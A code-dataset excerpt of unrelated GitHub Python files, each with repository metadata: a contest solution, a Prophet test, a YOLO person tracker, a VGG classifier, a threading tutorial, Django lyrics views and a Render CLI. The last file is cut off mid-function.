18405219239 | N,K = map(int,input().split())
def div_count(n,i):
ans = i
count = 0
while n>ans:
ans *= 2
count += 1
return count
ans = 0
for i in range(1,N+1):
count = div_count(K,i)
ans += (1/N) * pow(0.5,count)
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03043/s535174696.py | s535174696.py | py | 256 | python | en | code | 0 | github-code | 90 |
24785030365 |
import unittest
import pandas as pd
import numpy as np
from prophet_model import *
# from datasets import *
# from metrics import *
class TestProphetModel(unittest.TestCase):
def test_fit_and_predict(self):
n = 100
fh = [1, 2]
data = pd.DataFrame({'x': np.arange(n)})
data.index = pd.date_range('2020-01-01', periods=n)
# data = load_daily_data()
pr = ProphetModel()
pr.fit(data)
pred = pr.predict(fh)
self.assertEqual(len(pred), max(fh))
if __name__ == '__main__':
unittest.main() | dirknbr/forecast_py | prophet_model_test.py | prophet_model_test.py | py | 524 | python | en | code | 0 | github-code | 90 |
15936393649 | import cv2
import numpy as np
from ultralytics import YOLO
import socket
from norfair import Detection, Tracker
from datetime import datetime
import uuid
import time
import os
class Settings:
"""The class with global variables used throughout the code"""
last_time_notif = None
entered_time = None
exit_time = None
first_time_notif = None
UDP_PORT_NO_NOTIFICATIONS = 4242
UDP_IP_ADDRESS = "192.168.0.134"
Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
past_y_dict = {}
file_for_video = "videos/"
file_for_detections = "videos/"
if not os.path.exists(file_for_video):
os.makedirs(file_for_video)
if not os.path.exists(file_for_detections):
os.makedirs(file_for_detections)
setting = Settings()
class Yolo_detections:
"""Class with results of detecting people with YOLOv8 model"""
def __init__(self, task='predict', model='yolov8s.pt'):
# we use tensorrt speeded-up weights
if task == 'predict':
self.model = YOLO(model)
elif task == 'pose':
self.model = YOLO("services/models/yolov8s-pose.pt")
def detect(self, frame, classes=[0], centers=False, conf=0.4, iou=0.7):
"""Detecting people"""
yolo_detections = self.model.predict(
frame, classes=classes, conf=conf, verbose=False, iou=iou
)
res = yolo_detections[0].boxes.cpu().numpy()
if centers:
boxes = res.xywh.astype(np.uint32)
else:
boxes = res.xyxy.astype(np.uint32)
cls = res.cls.astype(np.uint8)
conf = res.conf
return boxes, cls, conf
def track(self, frame):
results = self.model.track(frame, classes=[0], persist=True, verbose=False, tracker='botsort.yaml')[
0].boxes.cpu().numpy()
boxes = results.xyxy.astype(np.uint32)
if results.id is None:
track_ids = []
else:
track_ids = results.id.astype(np.uint8)
clss = results.cls.astype(np.uint8)
conf = results.conf
return boxes, clss, track_ids, conf
def pose(self, frame):
results = self.model.track(
frame, verbose=False, conf=0.4, tracker='botsort.yaml')
return results
class Norfair_Detections:
"""Norfair is used as a tracker standard in our company"""
def __init__(self):
self.tracker = Tracker(
distance_function="euclidean",
distance_threshold=100,
# hit_counter_max=5,
initialization_delay=3,
)
def transform_yolo2norfair(self, yolo):
"""Pass the result of yolo detections for Norfair Tracker"""
self.boxes, self.cls, self.conf = yolo
detections = []
for i, box in enumerate(self.boxes):
detections.append(
[box[0], box[1], box[2], box[3], self.conf[i], self.cls[i]]
)
detections = np.asarray(detections)
norfair_detections = [Detection(points) for points in detections]
return norfair_detections
def update(self, yolo_det):
"""The function that updates tracking results in the main loop"""
norfair_detections = self.transform_yolo2norfair(yolo_det)
tracked_objects = self.tracker.update(detections=norfair_detections)
return tracked_objects
def draw_bboxes(self, frame, res):
"""The function that draws bounding boxes on people"""
for box in res:
track_id = box.id
x1, y1 = int(box.estimate[0, 0]), int(box.estimate[0, 1])
x2, y2 = int(box.estimate[0, 2]), int(box.estimate[0, 3])
cv2.putText(frame, str(track_id), (x1, y1+20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2, cv2.LINE_AA)
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 3)
class video_writer_advanced:
"""The more advanced class for video recording"""
def __init__(self):
self.fcc = cv2.VideoWriter_fourcc("X", "V", "I", "D")
self.fps = 20
self.path = None
self.key = None
self.record = False
self.video_writer = None
self.record_start_time = None
self.id = None
self.preview_path = None
self.preview_key = None
def start_recording(self, height=1080, width=1920):
"""The function that creates the id for video and initializes the videowriter"""
if not self.record:
self.id = str(uuid.uuid4())
self.record_start_time = time.time()
current_datetime = datetime.now()
formatted_date = current_datetime.strftime("%Y-%m-%d")
formatted_time = current_datetime.strftime("%H:%M:%S")
self.save_file = setting.file_for_detections + formatted_date + \
" " + formatted_time + " " + self.id + ".avi"
self.path = self.save_file
self.key = self.id + ".avi"
self.video_writer = cv2.VideoWriter(
self.save_file, self.fcc, self.fps, (width, height)
)
self.record = True
def update(self, frame):
"""The function that adds frames to the video. The process stops once the video duration reaches 3 sec"""
if self.record:
# print("writing a frame")
self.video_writer.write(frame)
# print(os.listdir(setting.file_for_detections))
if time.time() - self.record_start_time > 20:
self.record = False
self.video_writer.release()
def release(self):
if self.record:
self.record = False
self.video_writer.release()
| PikaBeka/bus-passenger-counter | utils/cls_git.py | cls_git.py | py | 5,691 | python | en | code | 0 | github-code | 90 |
18768116381 | import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import torch.nn.functional as F
import math
import cv2
import numpy as np
import os
model_urls = {'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth'}
class PAM(nn.Module):
def __init__(self, alpha):
super(PAM, self).__init__()
self.relu = nn.ReLU(inplace=True)
self.selector = nn.AdaptiveMaxPool2d(1)
self.alpha = alpha
def forward(self, x):
b, c, _, _ = x.size()
x = self.relu(x)
""" 1: selector """
peak_region = self.selector(x).view(b, c, 1, 1)
peak_region = peak_region.expand_as(x)
""" 2: Controller -> self.alpha"""
boundary = (x < peak_region * self.alpha)
""" 3: Peak Stimulator"""
x = torch.where(boundary, torch.zeros_like(x), x)
return x
class VGG(nn.Module):
def __init__(self, features, num_classes=20,
alpha=0.7, init_weights=True):
super(VGG, self).__init__()
self.features = features
self.layer1_conv1 = features[0]
self.layer1_conv2 = features[2]
self.layer1_maxpool = features[4]
self.layer2_conv1 = features[5]
self.layer2_conv2 = features[7]
self.layer2_maxpool = features[9]
self.layer3_conv1 = features[10]
self.layer3_conv2 = features[12]
self.layer3_conv3 = features[14]
self.layer3_maxpool = features[16]
self.layer4_conv1 = features[17]
self.layer4_conv2 = features[19]
self.layer4_conv3 = features[21]
self.layer4_maxpool = features[23]
self.layer5_conv1 = features[24]
self.layer5_conv2 = features[26]
self.layer5_conv3 = features[28]
self.extra_conv1 = nn.Conv2d(512, 512, kernel_size=3, padding=1)
self.extra_conv2 = nn.Conv2d(512, 512, kernel_size=3, padding=1)
self.extra_conv3 = nn.Conv2d(512, 512, kernel_size=3, padding=1)
self.extra_conv4 = nn.Conv2d(512, 20, kernel_size=1)
self.pam = PAM(alpha)
self.relu = nn.ReLU(inplace=True)
if init_weights:
self._initialize_weights(self.extra_conv1)
self._initialize_weights(self.extra_conv2)
self._initialize_weights(self.extra_conv3)
self._initialize_weights(self.extra_conv4)
def forward(self, x, label=None, size=None):
if size is None:
size = x.size()[2:]
# layer1
x = self.layer1_conv1(x)
x = self.relu(x)
x = self.layer1_conv2(x)
x = self.relu(x)
x = self.layer1_maxpool(x)
# layer2
x = self.layer2_conv1(x)
x = self.relu(x)
x = self.layer2_conv2(x)
x = self.relu(x)
x = self.layer2_maxpool(x)
# layer3
x = self.layer3_conv1(x)
x = self.relu(x)
x = self.layer3_conv2(x)
x = self.relu(x)
x = self.layer3_conv3(x)
x = self.relu(x)
x = self.layer3_maxpool(x)
# layer4
x = self.layer4_conv1(x)
x = self.relu(x)
x = self.layer4_conv2(x)
x = self.relu(x)
x = self.layer4_conv3(x)
x = self.relu(x)
x = self.layer4_maxpool(x)
# layer5
x = self.layer5_conv1(x)
x = self.relu(x)
x = self.layer5_conv2(x)
x = self.relu(x)
x = self.layer5_conv3(x)
x = self.relu(x)
# ==============================
x = self.extra_conv1(x)
x = self.pam(x)
x = self.extra_conv2(x)
x = self.pam(x)
x = self.extra_conv3(x)
x = self.pam(x)
x = self.extra_conv4(x)
# ==============================
logit = self.fc(x)
if self.training:
return logit
else:
cam = self.cam_normalize(x.detach(), size, label)
return logit, cam
def fc(self, x):
x = F.avg_pool2d(x, kernel_size=(x.size(2), x.size(3)), padding=0)
x = x.view(-1, 20)
return x
def cam_normalize(self, cam, size, label):
B, C, H, W = cam.size()
cam = F.relu(cam)
cam = cam * label[:, :, None, None]
cam = F.interpolate(cam, size=size, mode='bilinear', align_corners=False)
cam /= F.adaptive_max_pool2d(cam, 1) + 1e-5
return cam
def _initialize_weights(self, layer):
for m in layer.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def get_parameter_groups(self):
groups = ([], [], [], [])
for name, value in self.named_parameters():
if 'extra' in name:
if 'weight' in name:
groups[2].append(value)
else:
groups[3].append(value)
else:
if 'weight' in name:
groups[0].append(value)
else:
groups[1].append(value)
return groups
#######################################################################################################
def make_layers(cfg, batch_norm=False):
layers = []
in_channels = 3
for i, v in enumerate(cfg):
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
elif v == 'N':
layers += [nn.MaxPool2d(kernel_size=3, stride=1, padding=1)]
else:
if i > 13:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, dilation=2, padding=2)
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'D1': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'N', 512, 512, 512],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def vgg16_pam(pretrained=True, alpha=0.7):
model = VGG(make_layers(cfg['D1']), alpha=alpha)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['vgg16']), strict=False)
return model
if __name__ == '__main__':
import copy
model = vgg16(pretrained=True)
print()
print(model)
input = torch.randn(2, 3, 321, 321)
label = np.array([[1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0.]])
label = torch.from_numpy(label)
out = model(input, label)
print(out[1].shape)
| clovaai/BESTIE | PAM/models/classifier.py | classifier.py | py | 7,674 | python | en | code | 49 | github-code | 90 |
10177321616 | import json
fp_1 = input("Enter first filepath: ")
fp_2 = input("Enter second filepath: ")
fp_out = input("Enter output filepath: ")
with open(fp_1) as f1:
d1 = json.load(f1)
with open(fp_2) as f2:
d2 = json.load(f2)
merged ={key : value for key, value in list(d1.items()) + list(d2.items())}
with open(fp_out, "w") as fo:
json.dump(merged, fo, indent=4) | frederikschmitt/gpt-3-code-gen | data/python/json/program.py | program.py | py | 366 | python | en | code | 2 | github-code | 90 |
25070318314 | def run():
# for contador in range(1000):
# # if contador % 2 != 0:
# # continue
# # print(contador)
# # if contador == 500:
# # break
# # print(contador)
texto = input("Escribe un texto: ")
for letra in texto:
if letra == "o":
break
print(letra)
if __name__ == '__main__':
run() | eamarquezh/codigos_python | break_continue.py | break_continue.py | py | 381 | python | pt | code | 0 | github-code | 90 |
26687070192 | # -*- coding: utf-8 -*-
from bs4 import BeautifulSoup as bs
import urllib.request
import pymysql
import csv
b=[]
c=[]
tb = []
with open('./Kospi_data.csv','r') as csvfile:
reader = csv.reader(csvfile)
for i, row in enumerate(reader):
b.append(row[0])
c.append(row[1])
tb.append("kr"+row[0])
b.pop(0)
tb.pop(0)
# print tb
c.pop(0)
list = zip(b,c)
con = pymysql.connect(host='localhost', user='root', password='',
db="finance", charset='utf8')
for i in range(len(b)):
for p in range(1):
try:
# curs = con.cursor()
# html = urllib.request.urlopen('http://comp.fnguide.com/SVO2/ASP/SVD_Main.asp?pGB=1&gicode=A%s&cID=&MenuYn=Y&ReportGB=&NewMenuID=101&stkGb=701'% b[i])
html = urllib.request.urlopen('http://comp.fnguide.com/SVO2/ASP/SVD_Main.asp?pGB=1&gicode=A%s&cID=&MenuYn=Y&ReportGB=&NewMenuID=101&stkGb=701'% b[i])
html2 = urllib.request.urlopen('http://comp.fnguide.com/SVO2/ASP/SVD_Invest.asp?pGB=1&gicode=A%s&cID=&MenuYn=Y&ReportGB=&NewMenuID=105&stkGb=701'% b[i])
soup = bs(html, "html.parser")
soup2 = bs(html2, "html.parser")
table = b[i]
tsw = soup.find("div", "corp_group2")
prw = soup2.find_all("td", 'tdbg_y')
net = soup.find_all("td", 'tdbg_b')
# try:
try:
netp = float("".join(net[4].get_text().split(',')))
except:
netp = -1.0
try:
pcr = float(prw[35].get_text())
except:
pcr = -1.0
# dd = tsw.find_all("dd")[1]
try:
per = float(tsw.find_all("dd")[1].get_text())
except:
per = -1.0
try:
pbr = float(tsw.find_all("dd")[7].get_text())
except:
pbr = -1.0
try:
divid = float(tsw.find_all("dd")[9].get_text())
divid = divid.replace("%", '')
except:
divid = -1.0
if per == "-":
per = -1.0
if divid == "-":
divid = -1.0
# print c[i], b[i], per, pbr, pcr, divid, netp
# print type(c[i]), type(b[i]), type(per), type(pbr), type(pcr), type(divid), type(netp)
# qr = "insert into Information (CompanyCode, PER, PBR, PCR, Dividend, NetProfit)\
# values ('%s', %f, %f, %f, %f, %f)" % (b[i].zfill(6), per, pbr, pcr, divid, netp)
# print c[i], b[i], per, pbr, pcr, divid, netp
# curs.execute(qr)
# con.commit()
# curs.close()
# except:
# netp = 0
# pcr = float(prw[35].get_text())
# dd = tsw.find_all("dd")[1]
# per = tsw.find_all("dd")[1].get_text()
# pbr = float(tsw.find_all("dd")[7].get_text())
# divid = tsw.find_all("dd")[9].get_text()
# divid = divid.replace("%", '')
# if per == "-":
# per = -1
# if divid == "-":
# divid = -1
# print c[i], b[i], per, pbr, pcr, divid, netp
# qr = "insert into Information (Company, CompanyCode, PER, PBR, PCR, Dividend, NetProfit) \
# values ('%s', '%s', %0.2f, %0.2f, %0.2f, %0.2f, %d)" % (c[i], b[i], per, pbr, pcr, divid, netp)
# # curs.execute(qr)
# con.commit()
# curs.close()
except:
break
| TaewonHeo/kospi_parsing | Information.py | Information.py | py | 3,610 | python | en | code | 1 | github-code | 90 |
7679002864 |
import setuptools
import re
version = re.search(
'^__version__\s*=\s*"(.*)"',
open('pyfirth/PyFirth.py').read(),
re.M).group(1)
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="pyfirth",
version=version,
author="David Blair",
author_email="david.blair@ucsf.edu",
description="A very simple, inefficient implemention of Firth-penalized Logistic Regression for rare event data.",
long_description_content_type="text/markdown",
url="https://github.com/daverblair/PyFirth",
packages=setuptools.find_packages(),
install_requires=[
'numpy',
'pandas',
'scipy',
'statsmodels',
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| daverblair/PyFirth | setup.py | setup.py | py | 881 | python | en | code | 0 | github-code | 90 |
39871206725 | from isaac import Application
from codelets import HelloWorld
from utils import configure_websight_root, patch_capnp_paths
def main():
    """Build the Isaac app, attach the HelloWorld codelet, and run it."""
    # Required before touching the Isaac Python API.
    patch_capnp_paths()
    application = Application(app_filename="app/graphs/graph.app.json")
    # Register the Python codelet on the graph's hello_node.
    application.nodes["hello_node"].add(HelloWorld, "print")
    # Websight needs its webroot/assetroot configured when driven from Python.
    configure_websight_root(application)
    application.run()


if __name__ == "__main__":
    main()
| addyj/isaac_temp | app/main.py | main.py | py | 620 | python | en | code | 0 | github-code | 90 |
8672791092 | import threading
import time
from queue import Queue
import copy
def eat():
    """Demo worker: announce start, 'eat' ten times 0.1 s apart, announce end."""
    print("eat is runing")
    for _ in range(10):
        time.sleep(0.1)
        print('eating')
    print('eat is end')
def multi_thread():
    """Start eat() on a background thread and return immediately.

    Bug fixed: the original passed ``target=eat()`` which *called* eat() right
    here on the main thread and handed its return value (None) to Thread, so
    the worker thread itself ran nothing.  Thread wants the callable object.
    """
    my_thread = threading.Thread(target=eat)
    my_thread.start()
    print('eat_thread is running')
    # NOTE: this print usually appears before eat() finishes — the point of
    # the demo.  When one thread needs another thread's result, sequence them
    # with join() or pass results through a Queue.
def wake_up(arg):
    """Print a wake-up message plus *arg*, laze around ~2 s, then announce end."""
    print('now you is wake up')
    print(arg)
    # lie in for a moment
    for _ in range(2):
        time.sleep(1)
    print('wake up end')
def code(arg):
    """Print a coding message plus *arg*, then 'work' for ~5 seconds."""
    print('it\'s time to coding')
    print(arg)
    for _ in range(5):
        time.sleep(1)
    print('code is end')
def mulit_thread_join():
    """Run wake_up then code strictly in sequence by join()-ing each thread."""
    print('day is start')
    wake_thread = threading.Thread(
        target=wake_up, name="wake", args=('hello today',))
    # args passes positional parameters to the target callable.
    code_thread = threading.Thread(
        target=code, name="code", args=("best wish",))
    wake_thread.start()
    wake_thread.join()
    code_thread.start()
    code_thread.join()
    print('day is over')
def job(list_alpha, q):
    """Square every element of *list_alpha* and put the resulting list on *q*."""
    squares = [value ** 2 for value in list_alpha]
    q.put(squares)
def mulit_thread_queue():
    """Fan three job() calls out to threads and collect results via a Queue.

    Worker threads cannot return values directly, so each job() puts its
    result on a shared Queue; after joining all workers the main thread
    drains the queue with q.get().
    """
    results_queue = Queue()
    workers = []
    data = [list(range(10)), list(range(10, 20)), list(range(100, 110))]
    for idx in range(3):
        worker = threading.Thread(target=job, args=(data[idx], results_queue))
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()
    # Results arrive in thread-completion order, not submission order.
    result = [results_queue.get() for _ in range(3)]
    print('计算结束')
    print(result)
# --------------------多线程与常规方法对比---------------------------------------------
def thread_job(list_alhpa, q):
    """Sum *list_alhpa* and put the total on *q*."""
    q.put(sum(list_alhpa))
def multithreading(list_input):
    """Sum four copies of *list_input*, one thread per copy, and print the total.

    Because of the GIL the four threads still execute Python bytecode one at
    a time on a single core, so this is not faster than normal_cal(); true
    CPU parallelism needs multiprocessing (separate cores/processes).
    """
    partials = Queue()
    workers = []
    for idx in range(4):
        worker = threading.Thread(target=thread_job, args=(
            copy.copy(list_input), partials), name=f"cal_{idx}")
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()
    total_result = 0
    for _ in range(4):
        total_result += partials.get()
    print(total_result)
def normal_cal(list_input):
    """Sum *list_input* repeated four times; print and return the total."""
    quadrupled = list_input * 4
    grand_total = sum(quadrupled)
    print(grand_total)
    return grand_total
# Shared counter mutated by the two GIL demo jobs below.
A = 0
# Guards updates to A so the two jobs' increment loops don't interleave.
lock = threading.Lock()
def job_gil_1():
    """Add 1 to the shared global A ten times while holding the module lock."""
    global A, lock
    with lock:
        for _ in range(10):
            A += 1
    print('job_gil_1', A)
def job_gil_2():
    """Add 10 to the shared global A ten times while holding the module lock."""
    global A, lock
    with lock:
        for _ in range(10):
            A += 10
    print('job_gil_2', A)
def gil_entry():
    """Run the two GIL demo jobs concurrently and wait for both to finish."""
    # Each job locks around its whole loop, so the A updates never interleave.
    worker_one = threading.Thread(target=job_gil_1)
    worker_two = threading.Thread(target=job_gil_2)
    worker_one.start()
    worker_two.start()
    worker_one.join()
    worker_two.join()
    print('GIL test is end')
if __name__ == "__main__":
    # Demo 1: fire-and-forget thread.
    print(f'------------simple-----------------d')
    multi_thread()
    # Demo 2: sequencing threads with join().
    print('--------------join-----------------')
    mulit_thread_join()
    # Demo 3: collecting worker results through a Queue.
    print('------------queue---------------')
    mulit_thread_queue()
    # Demo 4: GIL — compare plain summation vs. the same work split over threads.
    print('------------gil---------------')
    list_input = list(range(1000000))
    time_start = time.time()
    normal_cal(list_input)
    print(f"常规计算方法消耗的时间:{time.time()-time_start}")
    time_start = time.time()
    multithreading(list_input=list_input)
    print(f"多线程计算方法消耗时间:{time.time()-time_start}")
    gil_entry()
| muyuchenzi/PYref | ReviewCode/QA_for_InterView/Multi_process_thread/sample_threading.py | sample_threading.py | py | 4,454 | python | en | code | 0 | github-code | 90 |
34618032000 |
# source:
# https://groups.google.com/forum/#!msg/pyqtgraph/vdYXled3uBU/9ZejuB8o8pwJ
import pyqtgraph as pg
import numpy as np
## build a QApplication before building other widgets
app=pg.mkQApp()
# Layout window: image view box on the left, gradient editor in column 1.
win = pg.GraphicsLayoutWidget()
win.show()
vb = win.addViewBox()
vb.setAspectLocked()
grad = pg.GradientEditorItem(orientation='right')
win.addItem(grad, 0, 1)
img = pg.ImageItem()
vb.addItem(img)
def update():
    # Re-derive a 512-entry lookup table from the gradient and apply it to the image.
    lut = grad.getLookupTable(512)
    img.setLookupTable(lut)
# Recolor the image whenever the user edits the gradient.
grad.sigGradientChanged.connect(update)
img.setImage(np.random.normal(size=(100,100)))
app.exec_() | rvalenzuelar/pythonx | simple_image.py | simple_image.py | py | 578 | python | en | code | 0 | github-code | 90 |
14189642077 | n=0
# Read the number of steps (prompt kept identical to the original).
n = int(input("n="))
# Staircase: row i has (n - i) leading spaces followed by i asterisks,
# so the stairs climb from a single star to a full row of n stars.
for i in range(1, n + 1):
    print(" " * (n - i) + "*" * i)
| snarii/desafio1 | Questao1.py | Questao1.py | py | 257 | python | pt | code | 0 | github-code | 90 |
23066749745 | import datetime
from rest_framework.decorators import api_view
from django.shortcuts import HttpResponse
from rest_framework import status
from app.mail_sender import send_mail
from app.models import Lyrics
import json
from rest_framework_simplejwt.serializers import TokenObtainPairSerializer
from django_files.settings import MAIL_SENDER_USER, SEND_MAIL_NEW_USER, URL_PREFIX_FOR_LINK
@api_view(['GET', 'POST', 'PUT'])
def lyrics(request):
    """List all lyrics (GET) or create a new lyric (POST) for the logged-in user.

    Returns 401 for anonymous users and 501 for unsupported methods.
    """
    if request.user.is_anonymous:
        return HttpResponse(json.dumps({"detail": "Not authorized"}), status=status.HTTP_401_UNAUTHORIZED)
    if request.method == "GET":
        # Bug fix: a QuerySet is not JSON serializable, so the original
        # json.dumps({"data": lyrics}) raised TypeError at runtime.
        # Serialize each row explicitly instead.
        all_lyrics = [
            {'id': item.id, 'name': item.name, 'allParagraphs': item.all_paragraphs}
            for item in Lyrics.objects.all()
        ]
        return HttpResponse(json.dumps({"data": all_lyrics}), status=status.HTTP_200_OK)
    if request.method == "POST":
        lyric = Lyrics()
        lyric.user = request.user
        lyric.name = request.data.get("name", "") or "Default name"
        # NOTE(review): naive local time; confirm whether timezone-aware
        # timestamps are expected here.
        lyric.date_added = datetime.datetime.now()
        lyric.all_paragraphs = request.data.get("allParagraphs", "")
        lyric.save()
        return HttpResponse(json.dumps({'data': {'id': lyric.id}}), status=status.HTTP_201_CREATED)
    return HttpResponse(json.dumps({"detail": "Wrong method"}), status=status.HTTP_501_NOT_IMPLEMENTED)
@api_view(['GET', 'PUT'])
def lyric(request, lyric_id):
    """Retrieve (GET) or update (PUT) a single Lyrics row by primary key."""
    if request.user.is_anonymous:
        return HttpResponse(json.dumps({"detail": "Not authorized"}), status=status.HTTP_401_UNAUTHORIZED)
    if request.method == "GET":
        # NOTE(review): an unknown id makes objects.get raise, surfacing as a
        # server error rather than a 404 — confirm this is intended.
        lyrics = Lyrics.objects.get(pk=lyric_id)
        #l = [serialize_rate(rate) for rate in rates]
        return HttpResponse(json.dumps({"data": {
            'id': lyrics.id,
            'allParagraphs': lyrics.all_paragraphs
        }}), status=status.HTTP_200_OK)
    if request.method == "PUT":
        # NOTE(review): no ownership check — any authenticated user appears to
        # be able to overwrite any lyric; confirm intended.
        lyric = Lyrics.objects.get(pk=lyric_id)
        lyric.all_paragraphs = request.data.get("allParagraphs", "")
        lyric.save()
        return HttpResponse(json.dumps({'data': {'id': lyric.id}}), status=status.HTTP_200_OK)
    return HttpResponse(json.dumps({"detail": "Wrong method"}), status=status.HTTP_501_NOT_IMPLEMENTED)
| sebastian-cherny-toptal/inverse-llc | src/app/all_views/views_lyrics.py | views_lyrics.py | py | 2,290 | python | en | code | 0 | github-code | 90 |
36407495323 | """Render Command-line interface."""
import json
from typing import Any
import click
from rich.console import Console
from render_cli.output.services_output import (
output_env_vars_as_table,
output_services_as_table,
)
import render_cli.render_services as rs
from render_cli.utils import (
convert_env_var_file,
convert_from_render_env_format,
convert_to_render_env_format,
)
from . import __version__
@click.group()
@click.version_option(version=__version__)
def cli() -> None:
    """A cli to manage your Render services."""
    # Root command group; subcommands are registered below via @cli.command().
    pass
@cli.command("list")
@click.option(
    "-v",
    "--verbose",
    is_flag=True,
    help="Display full json output from render api call.",
)
def list_services(verbose) -> Any:
    """Returns a list of all services associated with your Render account.

    Args:
        verbose: option to return a formatted json dump of all services
            instead of the default table view which just displays the
            service name, service id and service url.
    """
    services = rs.fetch_services()
    if not verbose:
        # Human-friendly default: a rich table of name / id / url.
        click.echo("\n")
        Console().print(output_services_as_table(services))
        return
    click.echo(json.dumps(services, indent=4))
@cli.command("find-service")
@click.option("-sn", "--service-name", type=str, help="Find service by name")
@click.option(
    "-v",
    "--verbose",
    is_flag=True,
    help="Display full json output from render api call.",
)
def find_service(service_name, verbose) -> Any:
    """Finds a Render service by name.

    Returns information about service if found.

    Args:
        service_name: name of service to search for.
        verbose: option to return a formatted json dump of all services
            instead of the default table view which just displays the
            service name, service id and service url.
    """
    match = rs.find_service_by_name(service_name)
    if not verbose:
        click.echo("\n")
        Console().print(output_services_as_table([match]))
        return
    click.echo(json.dumps(match, indent=4))
@cli.command("set-env")
@click.option("-f", "--file", type=str, help="File to load env vars from")
@click.option("-sn", "--service-name", type=str, help="Render service name")
@click.option(
    "-u",
    "--update",
    is_flag=True,
    help="Will update env vars with those in file rather completely overwrite.",
)
def set_env(file: str, service_name: str, update: bool) -> Any:
    """Will set environment variables for the specified service.

    This is completely replace all environment variables for a
    service with those provided here.

    Args:
        file: path to file containing the environment variables to set.
        service_name: name of service to set env vars for.
        update: update flag to indicate update env vars instead of overwrite.
    """
    service_id = rs.find_service_by_name(service_name)["service"]["id"]
    file_vars = convert_env_var_file(file)
    # Start from the service's current vars only when --update was given;
    # entries from the file win on key collisions.
    merged = {}
    if update:
        merged.update(
            convert_from_render_env_format(rs.retrieve_env_from_render(service_id))
        )
    merged.update(file_vars)
    rs.set_env_variables_for_service(
        service_id, convert_to_render_env_format(merged)
    )
@cli.command("list-env")
@click.option("-sid", "--service-id", type=str, help="Render service id")
@click.option("-sn", "--service-name", type=str, help="Render service name")
@click.option(
    "-v",
    "--verbose",
    is_flag=True,
    help="Display full json output from render api call.",
)
def list_env(service_id, service_name, verbose) -> Any:
    """Fetches list of environment variables of a service.

    Returns and lists the environment variables associated with
    the passed in service id or service name. Verbose mode
    will display json.

    Args:
        service_id: id of service whose environment variables to find.
        service_name: name of service whose environment variables to find.
        verbose: option to return a formatted json dump of all environment
            variable information.
    """
    if not service_id:
        if service_name:
            service_id = rs.find_service_by_name(service_name)["service"]["id"]
        else:
            click.echo("Need to provide service id or service name options")
            # Bug fix: bare exit() terminated with status 0 even though this
            # is an error; exit non-zero so callers/scripts can detect it.
            raise SystemExit(1)
    data = rs.retrieve_env_from_render(service_id)
    if verbose:
        click.echo(json.dumps(data, indent=4))
    else:
        console = Console()
        click.echo("\n")
        console.print(output_env_vars_as_table(data))
def recursive_help(cmd, parent=None) -> None:
    """Print the help page of *cmd*, then of every subcommand, depth-first.

    Args:
        cmd: command to get help for
        parent: parent command (used to build the click context chain)
    """
    context = click.core.Context(cmd, info_name=cmd.name, parent=parent)
    print(cmd.get_help(context))
    print()
    # Groups expose a .commands mapping; plain commands have none.
    for sub in getattr(cmd, "commands", {}).values():
        recursive_help(sub, context)
@cli.command("dump-help")
def dump_help() -> None:
    """Command to dump all help screen."""
    # Walk the whole command tree from the root group, printing each help page.
    recursive_help(cli)
| mnapoleon/render-cli | src/render_cli/console.py | console.py | py | 5,117 | python | en | code | 0 | github-code | 90 |
18247886519 | S = input()
N = len(S)  # length of the input string read above
def check(S1):
    """Return True if S1 reads the same forwards and backwards."""
    # The comparison already yields a bool; no need for an if/else ladder.
    return S1 == S1[::-1]
# Prefix: first (N-1)/2 characters, i.e. the left half excluding the middle.
POS = int((N-1)/2)
S1 = S[0:POS]
# Suffix: characters from position (N+3)/2 (1-indexed) through N.
POS = int((N+3)/2)
S2 = S[POS-1:N]
# A "strong palindrome": S itself, its left half, and its right half must all
# be palindromes.
if check(S) == False or check(S1) == False or check(S2) == False:
    print('No')
else:
    print('Yes')
| Aasthaengg/IBMdataset | Python_codes/p02730/s595600648.py | s595600648.py | py | 289 | python | en | code | 0 | github-code | 90 |
21708657442 | import random
# Takes in a list of data and returns a list of weighted pairs
# A weighted pair is a tuple in the form:
# (weight, item)
# weight is an integer > 1
# item can be anything
# The input list can contain two forms of data:
# 1. Individual items (default_weight is used to populate weight)
# 2. A weighted pair (weight, item)
def weighted_pairs(data, default_weight=1):
    """Normalize a list into (weight, item) tuples.

    Entries that already look like weighted pairs (a tuple whose first
    element is an int) keep their weight; everything else — bare items and
    tuples with a non-int head — is wrapped with *default_weight*.  A tuple
    payload of exactly one element is unwrapped to the element itself.
    """
    if type(data) != list:
        raise TypeError("Parameter 'data' is not of type <list>")
    if type(default_weight) != int:
